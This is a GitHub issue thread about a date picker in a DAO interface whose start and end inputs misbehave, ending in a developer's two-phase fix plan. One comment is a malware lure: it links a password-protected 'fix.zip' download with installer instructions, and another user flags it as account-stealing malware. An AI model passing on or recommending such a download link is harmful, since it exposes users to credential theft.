### ISSUE TITLE
Strange behavior on date picker component.

### ISSUE THREAD

**Issue by nicolaus-sherrill** [decentdao/decent-interface#2315]
Strange behavior on this date picker component. The start and end date inputs do not share the same component, rather they use two different date pickers, so I can select and override two different date ranges.

Additionally, the input field does not respond when I select a date and remains blank.

Lastly, I know we designed the date input fields in the date picker itself to be manually typed, but they aren't currently interactive and due to the positioning of the component the two input fields look very redundant. I think we should just remove those date fields from the date picker component.

![recording](https://netlify-cocoon.netlify.app/.netlify/functions/fetch?code=307&path=eyJzaXRlX2lkIjoiY2NhZDFmZmUtZDU4ZS00MjM4LWJiY2EtY2MwOTMxNTg1NWNmIiwiZGVwbG95X2lkIjoiNjZjY2IzZjk4NjY3ODkwMDA4NjhiMjVlIiwiaWQiOiI2YzYzMWE1MC02NTU1LTRmNzAtOTEyOC0xZjdiN2E1MTNhODQifQ==)

<details><summary>Browser metadata</summary>

```
Path:      /roles/edit/details?dao=sep:0xe20221A8939F9373C091262CBEF9493aca196acD&hatId=0xaac26be5e48b1859b982553e0ed9da801827d128cddd7f96627e8cdcb60eba2f
Browser:   Chrome 127.0.0.0 on Mac OS 10.15.7
Viewport:  1425 x 904 @2x
Language:  en-US
Cookies:   Enabled
```

[Open in BrowserStack](https://www.browserstack.com/user/try-live?url=https%3A%2F%2Fdeploy-preview-2309.app.dev.decentdao.org%2Froles%2Fedit%2Fdetails%3Fdao%3Dsep%3A0xe20221A8939F9373C091262CBEF9493aca196acD%26hatId%3D0xaac26be5e48b1859b982553e0ed9da801827d128cddd7f96627e8cdcb60eba2f&os=OS%20X&os_version=Catalina&browser=Chrome&browser_version=127.0&resolution=1425x904&speed=1&start=true&ref=netlify-source)

</details>

[Open Deploy Preview](https://deploy-preview-2309.app.dev.decentdao.org/roles/edit/details?dao=sep:0xe20221A8939F9373C091262CBEF9493aca196acD&hatId=0xaac26be5e48b1859b982553e0ed9da801827d128cddd7f96627e8cdcb60eba2f) · [Mark as Resolved](https://app.netlify.com/cdp/resolve?deployID=66ccb3f9866789000868b25e&commentID=66cdf6f4d7595335f5a369cc&resolution=resolved)

_Originally posted by @nicolaus-sherrill in https://github.com/decentdao/decent-interface/issues/2309#issuecomment-2312945908_

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by adamgall** [comment]
Two Phase Approach:

1. Start by just creating two single date pickers (for right now, for this issue)
  1. Select Start Date
  2. Select End Date (can't be before Start Date)
  3. No range highlighting
  4. Just two simple date pickers
2. Down the road come back to the UX and figure out a way to consolidate into a single Date Picker which includes the range selection
